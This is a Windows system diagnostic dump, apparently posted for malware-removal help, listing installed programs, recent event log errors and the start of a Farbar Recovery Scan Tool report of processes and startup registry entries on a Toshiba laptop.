"{26A24AE4-039D-4CA4-87B4-2F83216025FF}" = Java 6 Update 25

"{26CE484D-2E8E-40D5-B251-158133114C69}" = TomTom HOME

"{28DB8373-C1BB-444F-A427-A55585A12ED7}" = Motorola Device Manager

"{2902F983-B4C1-44BA-B85D-5C6D52E2C441}" = Windows Live Mesh ActiveX Control for Remote Connections

"{2A3FC24C-6EC0-4519-A52B-FDA4EA9B2D24}" = Windows Live Messenger

"{2A4EEB5C-3BA6-4299-A87F-783861B567D9}" = TurboTax 2013 WinPerReleaseEngine

"{2FA94A64-C84E-49d1-97DD-7BF06C7BBFB2}.WildTangent Games App" = Update Installer for WildTangent Games App

"{305706E3-A7FC-466F-8594-AD4522951418}" = Jewel Quest Mysteries Trail of the Midnight Heart

"{3135D885-9D9A-4B4D-8D45-9DB05DA115CA}" = Amazon Links

"{3336F667-9049-4D46-98B6-4C743EEBC5B1}" = Windows Live Photo Gallery

"{34F4D9A4-42C2-4348-BEF4-E553C84549E7}" = Windows Live Photo Gallery

"{358C44FD-6943-4CDD-B947-7F7C4ADC8A8F}" = TurboTax 2013 WinPerTaxSupport

"{3782EC09-4000-475E-8A59-9CABD6F03B4C}" = TurboTax 2010 WinPerFedFormset

"{378397D6-FD32-4092-A854-6A75CB7EDA46}" = MOTOROLA MEDIA LINK

"{3881DB80-EAA2-012B-ADAE-000000000000}" = TurboTax 2009 WinPerFedFormset

"{38975F50-EAA2-012B-ADB4-000000000000}" = TurboTax 2009 WinPerReleaseEngine

"{38A34630-EAA2-012B-ADB6-000000000000}" = TurboTax 2009 WinPerTaxSupport

"{3A2EEF40-EAA2-012B-AE15-000000000000}" = TurboTax 2009 wmoiper

"{3BF564F2-7434-454A-88DD-9A6114851751}" = National Geographic Collector's Pack

"{3C5A81D0-EAA2-012B-AE9F-000000000000}" = TurboTax 2009 wrapper

"{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}" = Intel® Rapid Storage Technology

"{4A03706F-666A-4037-7777-5F2748764D10}" = Java Auto Updater

"{4AB54F11-2F8C-11E3-B09F-B8AC6F97B88E}" = Google Earth Plug-in

"{4F2FCCCF-29F3-44B9-886F-6D16F8417522}" = TurboTax 2010 wrapper

"{51B4E156-14A5-4904-9AE4-B1AA2A0E46BE}" = TOSHIBA Supervisor Password

"{5279374D-87FE-4879-9385-F17278EBB9D3}" = TOSHIBA Hardware Setup

"{5401CEE8-3C2D-4835-A802-213306537FF4}" = MotoCast

"{5442DAB8-7177-49E1-8B22-09A049EA5996}" = Renesas Electronics USB 3.0 Host Controller Driver

"{579684A4-DDD5-4CA3-9EA8-7BE7D9593DB4}" = Windows Live UX Platform Language Pack

"{5AF550B4-BB67-4E7E-82F1-2C4300279050}" = TOSHIBARegistration

"{606EB5EB-AADF-4E21-B715-1CAD291181D6}" = TurboTax 2013 wrapper

"{617773AE-ADBA-4479-BB04-65FE7758B35C}" = TOSHIBA Wireless Display Monitor

"{620BBA5E-F848-4D56-8BDA-584E44584C5E}" = TOSHIBA Flash Cards Support Utility

"{65153EA5-8B6E-43B6-857B-C6E4FC25798A}" = Intel® Management Engine Components

"{654F7484-88C5-46DC-AB32-C66BCB0E2102}" = TOSHIBA Sleep Utility

"{682B3E4F-696A-42DE-A41C-4C07EA1678B4}" = Windows Live SOXE

"{6CB76C9D-80C2-4CB3-A4CD-D96B239E3F94}" = TOSHIBA Resolution+ Plug-in for Windows Media Player

"{6F3C8901-EBD3-470D-87F8-AC210F6E5E02}" = TOSHIBA Web Camera Application

"{70B446D1-E03B-4ab0-9B3C-0832142C9AA8}.WildTangent Games App-toshiba" = WildTangent Games App (Toshiba Games)

"{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}" = Microsoft Visual C++ 2005 Redistributable

"{71AA2137-C3F3-45C6-A408-81697FE5A3B8}" = PCmover Professional

"{7257132D-7F65-41E6-A90F-43BF6099461A}" = Intel® WiDi

"{7748A531-DACF-4B0A-B927-804EBC2CB5FE}" = TurboTax 2011 wmoiper

"{78002155-F025-4070-85B3-7C0453561701}" = Apple Application Support

"{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}" = Apple Software Update

"{7E4CB404-F1E4-4E81-A1CB-2CBB310481D1}" = MLE

"{837b34e3-7c30-493c-8f6a-2b0f04e2912c}" = Microsoft Visual C++ 2005 Redistributable

"{83C292B7-38A5-440B-A731-07070E81A64F}" = Windows Live PIMT Platform

"{8833FFB6-5B0C-4764-81AA-06DFEED9A476}" = Realtek Ethernet Controller Driver

"{894AB83D-A9AF-4E54-BFF3-A7262A0A6C13}" = Motorola Device Software Update

"{89EC099E-958D-462E-972C-385591946978}" = TurboTax 2012 WinPerFedFormset

"{8C6D6116-B724-4810-8F2D-D047E6B7D68E}" = Mesh Runtime

"{8DD46C6A-0056-4FEC-B70A-28BB16A1F11F}" = MSVCRT

"{8F3C31C5-9C3A-4AA8-8EFA-71290A7AD533}" = TomTom HOME Visual Studio Merge Modules

"{90140000-0015-0409-0000-0000000FF1CE}" = Microsoft Office Access MUI (English) 2010

"{90140000-0016-0409-0000-0000000FF1CE}" = Microsoft Office Excel MUI (English) 2010

"{90140000-0018-0409-0000-0000000FF1CE}" = Microsoft Office PowerPoint MUI (English) 2010

"{90140000-0019-0409-0000-0000000FF1CE}" = Microsoft Office Publisher MUI (English) 2010

"{90140000-001A-0409-0000-0000000FF1CE}" = Microsoft Office Outlook MUI (English) 2010

"{90140000-001B-0409-0000-0000000FF1CE}" = Microsoft Office Word MUI (English) 2010

"{90140000-001F-0409-0000-0000000FF1CE}" = Microsoft Office Proof (English) 2010

"{90140000-001F-040C-0000-0000000FF1CE}" = Microsoft Office Proof (French) 2010

"{90140000-001F-0C0A-0000-0000000FF1CE}" = Microsoft Office Proof (Spanish) 2010

"{90140000-002C-0409-0000-0000000FF1CE}" = Microsoft Office Proofing (English) 2010

"{90140000-003D-0000-0000-0000000FF1CE}" = Microsoft Office Single Image 2010

"{90140000-006E-0409-0000-0000000FF1CE}" = Microsoft Office Shared MUI (English) 2010

"{90140000-00A1-0409-0000-0000000FF1CE}" = Microsoft Office OneNote MUI (English) 2010

"{90140000-0115-0409-0000-0000000FF1CE}" = Microsoft Office Shared Setup Metadata MUI (English) 2010

"{90140000-0117-0409-0000-0000000FF1CE}" = Microsoft Office Access Setup Metadata MUI (English) 2010

"{92EA4134-10D1-418A-91E1-5A0453131A38}" = Windows Live Movie Maker

"{970472D0-F5F9-4158-A6E3-1AE49EFEF2D3}" = TOSHIBA Application Installer

"{9A25302D-30C0-39D9-BD6F-21E6EC160475}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17

"{9BE518E6-ECC6-35A9-88E4-87755C07200F}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161

"{9D56775A-93F3-44A3-8092-840E3826DE30}" = Windows Live Mail

"{9E565949-F5CD-40F1-B4F7-06FDA99EA132}" = TurboTax 2013 wmoiper

"{A0C91188-C88F-4E86-93E6-CD7C9A266649}" = Windows Live Mesh

"{A525E00B-6609-442E-9DCD-64453C233E8D}" = TurboTax 2010 WinPerReleaseEngine

"{A726AE06-AAA3-43D1-87E3-70F510314F04}" = Windows Live Writer

"{A8B1F076-965D-4663-A9D4-C2FB58A42AE4}" = TurboTax 2012 WinPerTaxSupport

"{A92DAB39-4E2C-4304-9AB6-BC44E68B55E2}" = Google Update Helper

"{A9BDCA6B-3653-467B-AC83-94367DA3BFE3}" = Windows Live Photo Common

"{AAAFC670-569B-4A2F-82B4-42945E0DE3EF}" = Windows Live Writer

"{AAF454FC-82CA-4F29-AB31-6A109485E76E}" = Windows Live Writer

"{AC6569FA-6919-442A-8552-073BE69E247A}" = TOSHIBA Service Station

"{AC76BA86-7AD7-FFFF-7B44-AA0000000001}" = Adobe Reader X (10.1.12) MUI

"{AFF7E080-1974-45BF-9310-10DE1A1F5ED0}" = Adobe AIR

"{B65BBB06-1F8E-48F5-8A54-B024A9E15FDF}" = TOSHIBA Recovery Media Creator

"{BD40253B-EFE2-4610-9AA5-F3317DB970BE}" = Jewel Quest Mysteries The Seventh Gate

"{C2A276E3-154E-44DC-AAF1-FFDD7FD30E35}" = TOSHIBA Assist

"{C31337DE-0CDC-45A9-9A32-F099AC78D557}" = Toshiba Book Place

"{C57BCDE1-7CB9-467D-B3BA-7E119916CDC1}" = Toshiba Online Backup

"{C66824E4-CBB3-4851-BB3F-E8CFD6350923}" = Windows Live Mail

"{C7A4F26F-F9B0-41B2-8659-99181108CDE3}" = TOSHIBA Media Controller

"{CAF5B770-082F-40C4-853D-3973BB81BDAA}" = TurboTax 2011 WinPerTaxSupport

"{CCA5EAAD-92F4-4B7A-B5EE-14294C66AB61}" = PlayReady PC Runtime x86

"{CE95A79E-E4FC-4FFF-8A75-29F04B942FF2}" = Windows Live UX Platform

"{D0B44725-3666-492D-BEF6-587A14BD9BD9}" = MSVCRT_amd64

"{D436F577-1695-4D2F-8B44-AC76C99E0002}" = Windows Live Photo Common

"{D45240D3-B6B3-4FF9-B243-54ECE3E10066}" = Windows Live Communications Platform

"{DA84ECBF-4B79-47F2-B34C-95C38484C058}" = Skype Launcher

"{DA909E62-3B45-4BA1-8B58-FCAEBA4BCEC9}" = NVIDIA PhysX

"{DDC8BDEE-DCAC-404D-8257-3E8D4B782467}" = Windows Live Writer Resources

"{DECDCB7C-58CC-4865-91AF-627F9798FE48}" = Windows Live Mesh

"{E09C4DB7-630C-4F06-A631-8EA7239923AF}" = D3DX10

"{E1754ED2-CD39-4F5F-AC98-0271EAE1C116}" = Setup

"{E185BD5C-0E10-479F-AF44-63D3A068446A}" = ICA

"{E24A5C1E-8647-43FD-838B-DF7149D492E4}" = DeviceIO

"{E2C2F547-4C5B-45F9-8445-C59E223CCB08}" = ContentHD

"{E3C1C994-CA69-4B3C-A290-C311617DE271}" = Contents

"{E463E171-4082-4744-A466-F7CBE8502789}" = TurboTax 2011 WinPerReleaseEngine

"{E5636C06-A318-4CF3-803B-5BD9F5C10822}" = PureHD

"{E5B21F11-6933-4E0B-A25C-7963E3C07D11}" = Windows Live Messenger

"{E5D50A9A-B973-46DE-89E4-8BDDD8A9F988}" = Share

"{E69992ED-A7F6-406C-9280-1C156417BC49}" = TOSHIBA Quality Application

"{E6ABA0E9-65E7-4366-9770-514ED4341611}" = VIO

"{E7EFA8C8-4CDE-4466-8E0E-01C04589ED90}" = ISCOM

"{E83F5F27-43F3-4163-ABE5-F68C989286ED}" = TurboTax 2012 wrapper

"{EA6625D5-E563-4FE3-8D98-B3F5B64CBC67}" = IPM_OEM

"{ED3CBA78-488F-4E8C-B33F-8E3BF4DDB4D2}" = Toshiba App Place

"{EDD9E0C4-B402-40DF-B33D-405CA1E23BA6}" = DFPro

"{EE556A3E-EB37-4392-9637-BAA8EC2F47FA}" = TurboTax 2011 wrapper

"{F014B696-28C5-4554-802F-A15380418F53}" = TurboTax 2012 WinPerReleaseEngine

"{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}" = Microsoft SQL Server 2005 Compact Edition [ENU]

"{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}" = Intel® Processor Graphics

"{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}" = Realtek High Definition Audio Driver

"{F26FDF57-483E-42C8-A9C9-EEE1EDB256E0}" = TOSHIBA Media Controller Plug-in

"{FAD3D68B-2F9C-459B-AA79-C04B9090FD72}" = TurboTax 2011 WinPerFedFormset

"{FBA641F3-7A87-4179-8E4E-F77D25BC1067}" = TurboTax 2012 wmoiper

"{FE044230-9CA5-43F7-9B58-5AC5A28A1F33}" = Windows Live Essentials

"{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022

"Adobe AIR" = Adobe AIR

"Adobe Flash Player ActiveX" = Adobe Flash Player 15 ActiveX

"Adobe Flash Player Plugin" = Adobe Flash Player 15 Plugin

"Amazing Adventures The Forgotten Dynasty" = Amazing Adventures The Forgotten Dynasty

"Amazon MP3 Downloader" = Amazon MP3 Downloader 1.0.17

"Big City Adventure San Francisco_is1" = Big City Adventure San Francisco

"Big City Adventure Sydney_is1" = Big City Adventure Sydney

"Castle - Never Judge a Book by Its Cover" = Castle - Never Judge a Book by Its Cover

"Escape The Emerald Star" = Escape The Emerald Star

"Escape Whisper Valley" = Escape Whisper Valley

"Google Chrome" = Google Chrome

"Hoyle Card Games Classic" = Hoyle Card Games Classic

"Hoyle Casino Classic" = Hoyle Casino Classic

"InstallShield_{066CFFF8-12BF-4390-A673-75F95EFF188E}" = TOSHIBA Value Added Package

"InstallShield_{12688FD7-CB92-4A5B-BEE4-5C8E0574434F}" = Utility Common Driver

"InstallShield_{1C8C049A-145F-4A6E-8290-B5C245EBE39D}" = TOSHIBA Bulletin Board

"InstallShield_{24811C12-F4A9-4D0F-8494-A7B8FE46123C}" = TOSHIBA ReelTime

"InstallShield_{51B4E156-14A5-4904-9AE4-B1AA2A0E46BE}" = TOSHIBA Supervisor Password

"InstallShield_{5279374D-87FE-4879-9385-F17278EBB9D3}" = TOSHIBA Hardware Setup

"InstallShield_{5442DAB8-7177-49E1-8B22-09A049EA5996}" = Renesas Electronics USB 3.0 Host Controller Driver

"InstallShield_{620BBA5E-F848-4D56-8BDA-584E44584C5E}" = TOSHIBA Flash Cards Support Utility

"InstallShield_{6F3C8901-EBD3-470D-87F8-AC210F6E5E02}" = TOSHIBA Web Camera Application

"InstallShield_{F67FA545-D8E5-4209-86B1-AEE045D1003F}" = TOSHIBA Face Recognition

"Malwarebytes Anti-Malware_is1" = Malwarebytes Anti-Malware version 2.0.3.1025

"Mystery P.I. - Stolen in San Francisco" = Mystery P.I. - Stolen in San Francisco

"Mystery P.I. - The New York Fortune" = Mystery P.I. - The New York Fortune

"N360" = Norton 360

"Norton PC Checkup_is1" = Norton PC Checkup

"NortonPCCheckup" = Toshiba Laptop Checkup

"NVIDIA StereoUSB Driver" = NVIDIA 3D Vision Controller Driver

"Office14.SingleImage" = Microsoft Office Professional 2010

"Samsung CLP-310 Series" = Samsung CLP-310 Series

"TurboTax 2009" = TurboTax 2009

"TurboTax 2010" = TurboTax 2010

"TurboTax 2011" = TurboTax 2011

"TurboTax 2012" = TurboTax 2012

"TurboTax 2013" = TurboTax 2013

"Vacation Quest - Australia" = Vacation Quest - Australia

"Vacation Quest - The Hawaiian Islands" = Vacation Quest - The Hawaiian Islands

"WildTangent toshiba Master Uninstall" = WildTangent Games

"WinLiveSuite" = Windows Live Essentials

"WTA-0c80c96a-47fe-4b60-9724-093f6a197352" = Tales of Lagoona

"WTA-15266c6a-1f91-4939-8397-a572d8609ef0" = FATE - The Traitor Soul

"WTA-35a2d0f9-7aa5-4ec1-a681-1e7f67317f9b" = Letters from Nowhere 2

"WTA-3d5c7790-1519-49e0-944a-524307e6f9f0" = Zuma's Revenge

"WTA-5cd3568b-66c2-4138-a92d-36394a12ae49" = Bejeweled 3

"WTA-5ee8d5c0-1a1b-4c99-87da-05a32548efa1" = RollerCoaster Tycoon 3: Platinum

"WTA-a98b9f0b-b8b2-4447-ab15-61d6b3a3b0f0" = Plants vs. Zombies - Game of the Year

"WTA-b6c271df-e1ef-4ec5-91dc-b8a276ccb8e5" = Penguins!

"WTA-fc1c5fea-b508-4d5e-8168-891f0007cf9d" = Polar Bowler

========== Last 20 Event Log Errors ==========

[ Application Events ]

Error - 7/6/2013 9:20:07 AM | Computer Name = Heathman-PC | Source = Toshiba App Place | ID = 0

Description =

Error - 7/6/2013 1:06:41 PM | Computer Name = Heathman-PC | Source = VSS | ID = 8193

Description =

Error - 7/6/2013 4:07:52 PM | Computer Name = Heathman-PC | Source = Microsoft Security Client Setup | ID = 100

Description = HRESULT:0x8004FF0A Description:Microsoft Security Essentials installation

was canceled. You canceled the Security Essentials installation on your computer.

Error code:0x8004FF0A.

Error - 7/6/2013 4:15:39 PM | Computer Name = Heathman-PC | Source = VSS | ID = 8193

Description =

Error - 7/6/2013 4:25:23 PM | Computer Name = Heathman-PC | Source = WinMgmt | ID = 10

Description =

Error - 7/6/2013 4:28:31 PM | Computer Name = Heathman-PC | Source = Toshiba App Place | ID = 0

Description =

Error - 7/6/2013 4:29:39 PM | Computer Name = Heathman-PC | Source = Application Error | ID = 1000

Description = Faulting application name: Kindle.exe, version: 1.10.4.40317, time

stamp: 0x505c6714 Faulting module name: Kindle.exe, version: 1.10.4.40317, time

stamp: 0x505c6714 Exception code: 0x40000015 Fault offset: 0x0029d874 Faulting process

id: 0x1490 Faulting application start time: 0x01ce7a8758320c8a Faulting application

path: C:\Users\Heathman\AppData\Local\Amazon\Kindle\application\Kindle.exe Faulting

module path: C:\Users\Heathman\AppData\Local\Amazon\Kindle\application\Kindle.exe

Report

Id: c7d96bee-e67a-11e2-b47e-dc0ea14cb7ed

Error - 7/7/2013 4:30:27 PM | Computer Name = Heathman-PC | Source = Toshiba App Place | ID = 0

Description =

Error - 7/7/2013 6:28:48 PM | Computer Name = Heathman-PC | Source = Toshiba App Place | ID = 0

Description =

Error - 7/7/2013 7:40:18 PM | Computer Name = Heathman-PC | Source = Toshiba App Place | ID = 0

Description =

[ System Events ]

Error - 10/28/2014 10:05:28 PM | Computer Name = Heathman-PC | Source = WMPNetworkSvc | ID = 866321

Description =

Error - 10/28/2014 10:05:28 PM | Computer Name = Heathman-PC | Source = WMPNetworkSvc | ID = 866317

Description =

Error - 10/28/2014 10:05:28 PM | Computer Name = Heathman-PC | Source = WMPNetworkSvc | ID = 866321

Description =

Error - 10/28/2014 10:05:28 PM | Computer Name = Heathman-PC | Source = WMPNetworkSvc | ID = 866317

Description =

Error - 10/28/2014 10:21:34 PM | Computer Name = Heathman-PC | Source = DCOM | ID = 10010

Description =

Error - 10/28/2014 10:21:40 PM | Computer Name = Heathman-PC | Source = DCOM | ID = 10010

Description =

Error - 10/28/2014 11:04:04 PM | Computer Name = Heathman-PC | Source = DCOM | ID = 10010

Description =

Error - 10/29/2014 8:15:16 AM | Computer Name = Heathman-PC | Source = Service Control Manager | ID = 7030

Description = The PEVSystemStart service is marked as an interactive service. However,

the system is configured to not allow interactive services. This service may not

function properly.

Error - 10/29/2014 8:19:08 AM | Computer Name = Heathman-PC | Source = Application Popup | ID = 1060

Description = \??\C:\ComboFix\catchme.sys has been blocked from loading due to incompatibility

with this system. Please contact your software vendor for a compatible version

of the driver.

Error - 10/29/2014 8:24:26 AM | Computer Name = Heathman-PC | Source = Service Control Manager | ID = 7030

Description = The PEVSystemStart service is marked as an interactive service. However,

the system is configured to not allow interactive services. This service may not

function properly.

< End of report >

[adh]

Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 29-10-2014

Ran by ADH (administrator) on HEATHMAN-PC on 29-10-2014 09:20:40

Running from C:\Users\ADH.Heathman-PC\Desktop\FRST64

Loaded Profiles: UpdatusUser & ADH (Available profiles: Heathman & UpdatusUser & ADH)

Platform: Windows 7 Home Premium Service Pack 1 (X64) OS Language: English (United States)

Internet Explorer Version 10

Boot Mode: Normal

Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe

(Microsoft Corporation) C:\Windows\System32\wlanext.exe

(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe

(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe

(Nero AG) C:\Program Files (x86)\Motorola Media Link\Lite\NServiceEntry.exe

(Intel® Corporation) C:\Program Files\Intel\WiFi\bin\EvtEng.exe

(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe

(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe

(Motorola Mobility LLC) C:\Program Files (x86)\Motorola Mobility\Motorola Device Manager\MotoHelperService.exe

(Symantec Corporation) C:\Program Files (x86)\Norton 360\Engine\21.6.0.32\N360.exe

(Symantec Corporation) C:\Program Files (x86)\PC Checkup\SymcPCCULaunchSvc.exe

(Symantec Corporation) C:\Program Files (x86)\Norton PC Checkup\Engine\2.0.13.11\ccSvcHst.exe

(Protexis Inc.) C:\Program Files (x86)\Common Files\Protexis\License Service\PsiService_2.exe

(Motorola) C:\Program Files (x86)\Motorola\MotForwardDaemon\ForwardDaemon.exe

(Intel® Corporation) C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe

(TOSHIBA Corporation) C:\Windows\System32\ThpSrv.exe

(TOSHIBA Corporation) C:\Windows\System32\TODDSrv.exe

(TomTom) C:\Program Files (x86)\TomTom HOME 2\TomTomHOMEService.exe

(TOSHIBA Corporation) C:\Program Files\TOSHIBA\Power Saver\TosCoSrv.exe

() C:\Program Files (x86)\Common Files\Ulead Systems\UDSS\UDSS.exe

(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE

(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TECO\TecoService.exe

(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE

(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe

(Microsoft Corporation) C:\Windows\System32\dllhost.exe

(TOSHIBA Corporation) C:\Program Files (x86)\TOSHIBA\TOSHIBA Service Station\TMachInfo.exe

(Intuit Inc.) C:\Program Files (x86)\Common Files\Intuit\Update Service\IntuitUpdateService.exe

(Intuit Inc.) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe

(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosSmartSrv.exe

(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TPHM\TPCHSrv.exe

(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe

(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe

(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe

(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbam.exe

(Intel Corporation) C:\Windows\System32\igfxtray.exe

(Intel Corporation) C:\Windows\System32\hkcmd.exe

(Intel Corporation) C:\Windows\System32\igfxpers.exe

(TOSHIBA Corporation) C:\Program Files\TOSHIBA\Power Saver\TPwrMain.exe

(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TBS\HSON.exe

(TOSHIBA Corporation) C:\Program Files\TOSHIBA\FlashCards\TCrdMain.exe

(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe

(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe

(TOSHIBA Corporation) C:\Windows\System32\ThpSrv.exe

(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TECO\Teco.exe

(Intel® Corporation) C:\Program Files\Common Files\Intel\WirelessCommon\iFrmewrk.exe

(TOSHIBA Corporation) C:\Program Files\TOSHIBA\ReelTime\TosReelTimeMonitor.exe

(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TPHM\TPCHWMsg.exe

(TOSHIBA CORPORATION) C:\Program Files (x86)\TOSHIBA\Utilities\KeNotify.exe

(TOSHIBA) C:\Program Files (x86)\TOSHIBA\TOSHIBA Sleep Utility\TSleepSrv.exe

(TOSHIBA Corporation) C:\Program Files (x86)\TOSHIBA\TOSHIBA Service Station\ToshibaServiceStation.exe

(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosSENotify.exe

() C:\Windows\Samsung\PanelMgr\SSMMgr.exe

(Apple Inc.) C:\Program Files (x86)\iTunes\iTunesHelper.exe

() C:\Windows\Samsung\PanelMgr\caller64.exe

(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe

() C:\Program Files\TOSHIBA\FlashCards\Hotkey\TCrdKBB.exe

(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\NvXDSync.exe

(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe

(Symantec Corporation) C:\Program Files (x86)\Norton 360\Engine\21.6.0.32\N360.exe

(Symantec Corporation) C:\Program Files (x86)\Norton PC Checkup\Engine\2.0.13.11\ccSvcHst.exe

(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe

(Motorola Mobility LLC) C:\Program Files (x86)\Motorola Mobility\Motorola Device Manager\MotoHelperAgent.exe

(Google Inc.) C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbarUser_32.exe

(Microsoft Corporation) C:\Windows\System32\MsSpellCheckingFacility.exe

==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [TPwrMain] => C:\Program Files\TOSHIBA\Power Saver\TPwrMain.EXE [590256 2011-05-17] (TOSHIBA Corporation)

HKLM\...\Run: [HSON] => C:\Program Files\TOSHIBA\TBS\HSON.exe [296824 2010-09-25] (TOSHIBA Corporation)

HKLM\...\Run: [TCrdMain] => C:\Program Files\TOSHIBA\FlashCards\TCrdMain.exe [972672 2011-04-27] (TOSHIBA Corporation)

HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [11775592 2011-01-26] (Realtek Semiconductor)

HKLM\...\Run: [RtHDVBg] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [2188904 2011-01-18] (Realtek Semiconductor)

HKLM\...\Run: [synTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2679592 2011-02-03] (Synaptics Incorporated)

HKLM\...\Run: [ThpSrv] => C:\windows\system32\thpsrv /logon

HKLM\...\Run: [Teco] => C:\Program Files\TOSHIBA\TECO\Teco.exe [1544624 2011-05-24] (TOSHIBA Corporation)

HKLM\...\Run: [intelPAN] => C:\Program Files\Common Files\Intel\WirelessCommon\iFrmewrk.exe [1935120 2011-06-01] (Intel® Corporation)

HKLM\...\Run: [TosSENotify] => C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosWaitSrv.exe [710560 2011-06-09] (TOSHIBA Corporation)

HKLM\...\Run: [TosWaitSrv] => C:\Program Files\TOSHIBA\TPHM\TosWaitSrv.exe [712096 2011-07-01] (TOSHIBA Corporation)

HKLM\...\Run: [TosVolRegulator] => C:\Program Files\TOSHIBA\TosVolRegulator\TosVolRegulator.exe [24376 2009-11-11] (TOSHIBA Corporation)

HKLM\...\Run: [TosNC] => C:\Program Files\Toshiba\BulletinBoard\TosNcCore.exe [597936 2011-07-27] (TOSHIBA Corporation)

HKLM\...\Run: [TosReelTimeMonitor] => C:\Program Files\TOSHIBA\ReelTime\TosReelTimeMonitor.exe [38824 2011-06-28] (TOSHIBA Corporation)

HKLM-x32\...\Run: [sVPWUTIL] => C:\Program Files (x86)\TOSHIBA\Utilities\SVPWUTIL.exe [532480 2010-11-09] (TOSHIBA CORPORATION)

HKLM-x32\...\Run: [HWSetup] => C:\Program Files\TOSHIBA\Utilities\HWSetup.exe [423936 2011-03-10] (TOSHIBA Electronics, Inc.)

HKLM-x32\...\Run: [KeNotify] => C:\Program Files (x86)\TOSHIBA\Utilities\KeNotify.exe [34160 2010-08-16] (TOSHIBA CORPORATION)

HKLM-x32\...\Run: [ToshibaServiceStation] => C:\Program Files (x86)\TOSHIBA\TOSHIBA Service Station\ToshibaServiceStation.exe [1298816 2011-07-11] (TOSHIBA Corporation)

HKLM-x32\...\Run: [ToshibaAppPlace] => C:\Program Files (x86)\Toshiba\Toshiba App Place\ToshibaAppPlace.exe [552960 2010-09-23] (Toshiba)

HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959176 2014-08-21] (Adobe Systems Incorporated)

HKLM-x32\...\Run: [samsung PanelMgr] => C:\windows\Samsung\PanelMgr\ssmmgr.exe [606208 2009-12-09] ()

HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [43816 2014-07-31] (Apple Inc.)

HKLM-x32\...\Run: [iTunesHelper] => C:\Program Files (x86)\iTunes\iTunesHelper.exe [152392 2014-08-01] (Apple Inc.)

Winlogon\Notify\igfxcui: C:\windows\system32\igfxdev.dll (Intel Corporation)

HKU\S-1-5-21-616022151-183045692-1389677156-1014\...\Run: [swg] => C:\Program Files (x86)\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe [39408 2012-03-24] (Google Inc.)

AppInit_DLLs: C:\Windows\System32\nvinitx.dll => C:\Windows\System32\nvinitx.dll [260416 2012-02-29] (NVIDIA Corporation)

AppInit_DLLs-x32: C:\Windows\SysWOW64\nvinit.dll => C:\Windows\SysWOW64\nvinit.dll [215360 2012-02-29] (NVIDIA Corporation)

ShellIconOverlayIdentifiers: [OverlayExcluded] -> {4433A54A-1AC8-432F-90FC-85F045CF383C} => C:\Program Files (x86)\Norton 360\Engine64\21.6.0.32\buShell.dll (Symantec Corporation)

ShellIconOverlayIdentifiers: [OverlayPending] -> {F17C0B1E-EF8E-4AD4-8E1B-7D7E8CB23225} => C:\Program Files (x86)\Norton 360\Engine64\21.6.0.32\buShell.dll (Symantec Corporation)

ShellIconOverlayIdentifiers: [OverlayProtected] -> {476D0EA3-80F9-48B5-B70B-05E677C9C148} => C:\Program Files (x86)\Norton 360\Engine64\21.6.0.32\buShell.dll (Symantec Corporation)

==================== Internet (Whitelisted) ====================
